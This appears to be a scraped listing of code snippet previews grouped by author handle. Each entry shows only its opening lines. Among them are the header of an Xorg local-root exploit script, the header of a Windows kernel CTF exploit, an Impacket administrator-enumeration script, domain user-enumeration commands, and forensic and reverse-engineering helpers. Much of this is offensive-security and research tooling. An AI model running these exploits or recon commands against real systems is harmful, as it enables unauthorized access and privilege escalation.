markusleh

import svgwrite
import volatility.conf as conf
import volatility.registry as registry
import volatility.plugins.volshell as shell
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
import volatility.utils as utils
registry.register_global_options(config, commands.Command)

xorrior

using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;

ropnop

#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
#
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket

pydevops

• 0.1. References
• 0.2. Other cheatsheets
• 0.3. Manage multiple gcloud config configurations
  • 0.3.1. Switch gcloud context with gcloud config
• 0.4. Credentials
• 0.5. info
• 0.6. projects
• 0.7. zones & regions
• 0.8. Organization
• 0.9. billing

its-a-feature

Domain: TEST.local
User Enumeration:
  Windows:
    net user
    net user /domain
    net user [username]
    net user [username] /domain
    wmic useraccount
  Mac:
    dscl . ls /Users

shortjared

a4b.amazonaws.com
access-analyzer.amazonaws.com
account.amazonaws.com
acm-pca.amazonaws.com
acm.amazonaws.com
airflow-env.amazonaws.com
airflow.amazonaws.com
alexa-appkit.amazon.com
alexa-connectedhome.amazon.com
amazonmq.amazonaws.com

xpn

using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

j00ru

// WCTF 2018 "searchme" task exploit
//
// Author:    Mateusz "j00ru" Jurczyk
// Date:      6 July 2018
// Tested on: Windows 10 1803 (10.0.17134.165)
//
// See also:  https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>

0x27

#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector. 
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c

cetfor

from ghidra.app.emulator import EmulatorHelper
from ghidra.program.model.symbol import SymbolUtilities

# Tested with Ghidra v9.1 and v9.1.1, future releases are likely to simplify
# and/or expand the EmulatorHelper class in the API.

# == Helper functions ======================================================
def getAddress(offset):
    return currentProgram.getAddressFactory().getDefaultAddressSpace().getAddress(offset)